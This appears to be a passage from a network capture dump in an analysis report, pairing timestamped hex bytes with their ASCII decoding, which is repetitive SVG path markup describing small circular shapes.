                                                                                                                                                                                                                                                                          Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15681INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15697INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:53 UTC15713INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16114INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16130INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16146INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16162INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16178INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16194INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16210INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16226INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16242INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16258INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16275INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16291INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16307INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16323INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
